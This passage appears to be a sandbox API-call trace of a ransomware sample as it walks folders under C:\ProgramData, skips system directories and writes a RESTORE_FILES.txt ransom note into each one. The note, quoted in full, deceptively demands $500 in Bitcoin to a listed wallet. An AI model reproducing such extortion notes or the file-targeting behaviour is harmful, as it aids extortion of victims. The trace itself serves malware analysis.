(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.932] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.932] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.932] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.932] CloseHandle (hObject=0xa4) returned 1 [0072.932] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.933] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.933] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\RESTORE_FILES.txt") returned 44 [0072.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.934] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.934] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.934] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.934] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.935] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.935] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0072.935] CloseHandle (hObject=0xac) returned 1 [0072.937] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Windows") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Program Files") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Program Files (x86)") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="$Recycle.bin") returned 1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="System Volume Information") returned -1 [0072.937] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle") returned 25 [0072.937] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1 [0072.937] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1 [0072.937] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\*") returned 27 [0072.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\.") returned 27 [0072.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.938] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.938] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.938] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.938] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.938] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.938] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\..") returned 28 [0072.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.938] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.938] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\RESTORE_FILES.txt") returned 43 [0072.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\oracle\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0072.939] CloseHandle (hObject=0xac) returned 1 [0072.939] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Windows") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files (x86)") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="$Recycle.bin") returned 1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="System Volume Information") returned -1 [0072.940] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache") returned 32 [0072.940] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1 [0072.940] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1 [0072.940] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\*") returned 34 [0072.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.951] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.951] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.951] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.951] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\.") returned 34 [0072.951] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.951] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.958] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\..") returned 35 [0072.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.958] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Windows") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Program Files") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="Program Files (x86)") returned -1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="$Recycle.bin") returned 1 [0072.958] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="System Volume Information") returned -1 [0072.958] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 73 [0072.958] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0072.958] lstrcmpW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0072.958] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*") returned 75 [0072.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0072.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\.") returned 75 [0072.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\..") returned 76 [0072.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.959] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0072.959] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0072.959] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 82 [0072.959] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0072.959] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*") returned 84 [0072.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0072.960] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\.") returned 84 [0072.960] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.960] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\..") returned 85 [0072.960] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.960] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Windows") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0072.960] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0072.960] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 88 [0072.960] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0072.960] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*") returned 90 [0072.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0072.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.961] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.961] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.961] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\.") returned 90 [0072.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.961] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.961] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\..") returned 91 [0072.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.961] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.961] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0072.961] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0072.961] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 92 [0072.961] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0072.961] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*") returned 94 [0072.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x447cc0 [0072.962] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\.") returned 94 [0072.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.962] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.962] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\..") returned 95 [0072.963] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.963] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Windows") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files (x86)") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$Recycle.bin") returned 1 [0072.963] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="System Volume Information") returned 1 [0072.963] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 